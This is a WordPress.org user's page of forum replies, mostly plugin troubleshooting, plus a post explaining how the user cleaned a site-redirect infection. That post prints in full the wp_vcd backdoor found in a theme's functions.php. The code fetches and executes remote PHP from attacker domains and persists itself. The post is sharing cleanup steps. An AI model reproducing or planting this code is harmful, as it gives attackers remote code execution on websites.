Title: lfbender's Replies | WordPress.org

---

# lfbender

  [  ](https://wordpress.org/support/users/lfbender/)

 *   [Profile](https://wordpress.org/support/users/lfbender/)
 *   [Topics Started](https://wordpress.org/support/users/lfbender/topics/)
 *   [Replies Created](https://wordpress.org/support/users/lfbender/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/lfbender/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/lfbender/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/lfbender/engagements/)
 *   [Favorites](https://wordpress.org/support/users/lfbender/favorites/)

 Search replies:

## Forum Replies Created

Viewing 14 replies - 1 through 14 (of 14 total)

 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Relevanssi - A Better Search] Indexing gets stuck with acf error message in log](https://wordpress.org/support/topic/indexing-gets-stuck-with-acf-error-message-in-log/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/indexing-gets-stuck-with-acf-error-message-in-log/#post-15138764)
 * Thank you for this.
    I am reviewing what custom fields I actually want people
   to be able to find and I will test your filter accordingly.
 * For now my immediate issue has been answered and resolved.
 * Thank you for the fast and thorough help.
 * 🙂
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Relevanssi - A Better Search] Indexing gets stuck with acf error message in log](https://wordpress.org/support/topic/indexing-gets-stuck-with-acf-error-message-in-log/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/indexing-gets-stuck-with-acf-error-message-in-log/#post-15138659)
 * Yes, I have selected also checkbox fields for indexing.
 * I did not think it would be a problem.
 * And yes, removing the ckeckbox fields from the indexed custom fields unstuck 
   the process.
 * Thank you.
 * So just to know: there is no way to index checkbox custom fields right now?
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[My Favorites] Favorite counter](https://wordpress.org/support/topic/favorite-counter/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [4 years, 10 months ago](https://wordpress.org/support/topic/favorite-counter/#post-14590883)
 * Hi [@takashimatsuyama](https://wordpress.org/support/users/takashimatsuyama/)
   and thanks for the answer.
 * I am already using the custom template.
 * Yes, I would be interested in only the number of saved posts for the user and
   to display that number on an archive page saying, “You have saved 3 favorites”.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer] Clearfy feature prevents WP-facets from loading results](https://wordpress.org/support/topic/clearfy-feature-prevents-wp-facets-from-loading-results/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 1 month ago](https://wordpress.org/support/topic/clearfy-feature-prevents-wp-facets-from-loading-results/#post-14204936)
 * FacetWP just came out with an update that includes a fix for this too (ver 3.8.1),
   so this works now.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer] Clearfy feature prevents WP-facets from loading results](https://wordpress.org/support/topic/clearfy-feature-prevents-wp-facets-from-loading-results/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 2 months ago](https://wordpress.org/support/topic/clearfy-feature-prevents-wp-facets-from-loading-results/#post-14200937)
 * Here is some more info from facetWP support:
 * When I look at the AJAX response, your site’s HTML header is getting injected
   into the response, causing the JSON to break. This is usually caused by some 
   sort of output buffering that gets opened but not closed properly. I.e. also 
   check for any custom uses of ob_start()…
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Contact form 7 Custom validation] Contact Form 7 custom validation hook not working](https://wordpress.org/support/topic/contact-form-7-custom-validation-hook-not-working/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 3 months ago](https://wordpress.org/support/topic/contact-form-7-custom-validation-hook-not-working/#post-14020351)
 * The hook works now and I don’t have an explanation as to what changed. Might 
   have been a caching issue.
 *   Forum: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
   
   In reply to: [Passing PHP array to javascript breaks other scripts](https://wordpress.org/support/topic/passing-php-array-to-javascript-breaks-other-scripts/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 6 months ago](https://wordpress.org/support/topic/passing-php-array-to-javascript-breaks-other-scripts/#post-13652329)
 * The problem was a piece of bad Javascript code I wrote.
 *     ```
            let mPoint = (document.createTextNode = point);
       ```
   
 * I find it still interesting that the console error lead me to anywhere else than
   to the faulty line in my script.
 * After fixing this, there were no more errors.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Relevanssi - A Better Search] Relevanssi logging search excludes don’t exclude](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 9 months ago](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/#post-13281670)
 * So, I noticed that the var_dump gave the strings with spaces. So I removed the
   spaces from the list of excludes, only leaving:
 * user1,user2,user3
 * (without any spaces), and now it seems to work.
 * I would put a warning regarding this, to clarify that you need the list without
   spaces. Or just run the list through a regex replace or something.
 * Thanks for the quick response and help!
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Relevanssi - A Better Search] Relevanssi logging search excludes don’t exclude](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 9 months ago](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/#post-13281623)
 * It returns the list of excluded Users:
    array(7) { [0]=> string(3) “user1″ [1]
   => string(5) ” user2″ [2]=> string(7) ” user2″ [3]=> string(5) ” user3″ [4]=>
   string(6) ” user4″ [5]=> string(9) ” user5″ [6]=> string(7) ” user6″ } int(10)
   string(5) “user7” 
 * But the log still shows the searches…
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Relevanssi - A Better Search] Relevanssi logging search excludes don’t exclude](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [5 years, 9 months ago](https://wordpress.org/support/topic/relevanssi-logging-search-excludes-dont-exclude/#post-13281030)
 * Hi [@msaari](https://wordpress.org/support/users/msaari/),
 * I went to Relevanssi Search Options –> Logging –> Exclude users.
 * I listed the user ids, like this:
    1, 2, 3, 4 I saved.
 * I went to the search form on my home page and did a search.
 * Then I went to Dashboard –> User searches to check if my search showed up (I 
   excluded also my user id) and it did.
 * I repeated all the above using user names, instead of user id with the same result.
 * What did I miss?
 *   Forum: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
   
   In reply to: [Buil in functions not deleting file of attachments](https://wordpress.org/support/topic/buil-in-functions-not-deleting-file-of-attachments/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [6 years, 3 months ago](https://wordpress.org/support/topic/buil-in-functions-not-deleting-file-of-attachments/#post-12344026)
 * [@bcworkz](https://wordpress.org/support/users/bcworkz/) Thank you. Although 
   I didn’t use the exact way you have described, you helped me find a way that 
   works. I used filenames and filepaths to identify if the PDF will have a different
   title or not and unlinked based on that. If it is just an update, it just overwrites
   the file, no unlinking needed, if it is a file with a new name, it deletes the
   old attachment.
 *   Forum: [Themes and Templates](https://wordpress.org/support/forum/themes-and-templates/)
   
   In reply to: [[OceanWP] After updating OceanWp, the checkbox’s tick doesn’t display](https://wordpress.org/support/topic/after-updating-oceanwp-the-checkboxs-tick-doesnt-display/)
 *  [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/after-updating-oceanwp-the-checkboxs-tick-doesnt-display/#post-12149962)
 * I have the same issue.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Spammy site redirect](https://wordpress.org/support/topic/spammy-site-redirect/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/spammy-site-redirect/#post-11925795)
 * So I managed to clean all my sites (7), so thank you [@simplix](https://wordpress.org/support/users/simplix/).
 * These are the steps I have taken (using also what [@simplix](https://wordpress.org/support/users/simplix/)
   wrote).
 * At the very beginning of the functions.php in the affected theme was a whole 
   code before any other that looked like this:
 *     ```
       <?php
       if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
       {
       $div_code_name="wp_vcd";
       switch ($_REQUEST['action'])
       {
   
       case 'change_domain';
       if (isset($_REQUEST['newdomain']))
       {
   
       if (!empty($_REQUEST['newdomain']))
       {
       if ($file = @file_get_contents(__FILE__))
       {
       if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
       {
   
       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
       @file_put_contents(__FILE__, $file);
       print "true";
       }
   
       }
       }
       }
       break;
   
       case 'change_code';
       if (isset($_REQUEST['newcode']))
       {
   
       if (!empty($_REQUEST['newcode']))
       {
       if ($file = @file_get_contents(__FILE__))
       {
       if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
       {
   
       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
       @file_put_contents(__FILE__, $file);
       print "true";
       }
   
       }
       }
       }
       break;
   
       default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
       }
   
       die("");
       }
   
       $div_code_name = "wp_vcd";
       $funcfile      = __FILE__;
       if(!function_exists('theme_temp_setup')) {
       $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
       if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
   
       function file_get_contents_tcurl($url)
       {
       $ch = curl_init();
       curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
       curl_setopt($ch, CURLOPT_HEADER, 0);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch, CURLOPT_URL, $url);
       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
       $data = curl_exec($ch);
       curl_close($ch);
       return $data;
       }
   
       function theme_temp_setup($phpCode)
       {
       $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
       $handle   = fopen($tmpfname, "w+");
       if( fwrite($handle, "<?php\n" . $phpCode))
       {
       }
       else
       {
       $tmpfname = tempnam('./', "theme_temp_setup");
       $handle   = fopen($tmpfname, "w+");
       fwrite($handle, "<?php\n" . $phpCode);
       }
       fclose($handle);
       include $tmpfname;
       unlink($tmpfname);
       return get_defined_vars();
       }
   
       $wp_auth_key='12335f8c45ff73be536601a7562a3220';
       if (($tmpcontent = @file_get_contents("http://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
   
       if (stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent));
       @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
   
       if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
       @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
       if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
       @file_put_contents('wp-tmp.php', $tmpcontent);
       }
       }
   
       }
       }
   
       elseif ($tmpcontent = @file_get_contents("http://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
   
       if (stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent));
       @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
   
       if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
       @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
       if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
       @file_put_contents('wp-tmp.php', $tmpcontent);
       }
       }
   
       }
       } 
   
       elseif ($tmpcontent = @file_get_contents("http://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
   
       if (stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent));
       @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
   
       if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
       @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
       if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
       @file_put_contents('wp-tmp.php', $tmpcontent);
       }
       }
   
       }
       }
       elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent));
   
       } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent)); 
   
       } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
       extract(theme_temp_setup($tmpcontent)); 
   
       } 
   
       }
       }
   
       //$start_wp_theme_tmp
       //wp_tmp
       //$end_wp_theme_tmp
       ?>
       ```
   
 * I deleted this.
 * Then I went into the wp-includes folder and deleted:
    wp-vcd.php wp-tmp.php wp-
   feed.php
 * Then I went into phpMyAdmin for the database cleaning:
 * I did a full database search for %bullgoesdown% and %wiilberedmodels% (these 
   were the pages that the user was sent to, even though it is not the page you 
   see when you see the redirect in action because these sites are also only redirecting)
   which gave me probably every single post and page content. From this I saw the
   exact scripts and where the malware has made changes.
 * I used the exact script to do what [@simplix](https://wordpress.org/support/users/simplix/)
   suggested for the post_content column of the wp_posts table. Then I found and
   changed the malware site addresses in wp_options.
 * If you have a hard time finding initial data on what to look for I used [https://aw-snap.info](https://aw-snap.info)
   which has a tool for printing out the pages code for analyzing. There you should
   be able to find the scripts that are used and keywords for the spammy domains.
 * As a last step I deleted the wp-rocket cache, changed passwords, deleted unused
   themes and updated all plugins that were free.
 * Hope this helps someone else too.
    -  This reply was modified 6 years, 8 months ago by [lfbender](https://wordpress.org/support/users/lfbender/).
    -  This reply was modified 6 years, 8 months ago by [lfbender](https://wordpress.org/support/users/lfbender/).
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Spammy site redirect](https://wordpress.org/support/topic/spammy-site-redirect/)
 *  Thread Starter [lfbender](https://wordpress.org/support/users/lfbender/)
 * (@lfbender)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/spammy-site-redirect/#post-11922209)
 * Thank you [@simplix](https://wordpress.org/support/users/simplix/) for this.
 * I tried to follow your instructions as closely as possible and I found additional
   things in the database to correct. I didn’t however find anything for the guid
   and the postmeta.
    Which wouldn’t bother me, except the site’s behavior didn’t
   change, so there has to be other things. I now saw that I probably have other
   things in the files too, I just have no idea what to look for anymore. I cannot
   unfortunately update the plugins as wp-admin is still not accessible.

Viewing 14 replies - 1 through 14 (of 14 total)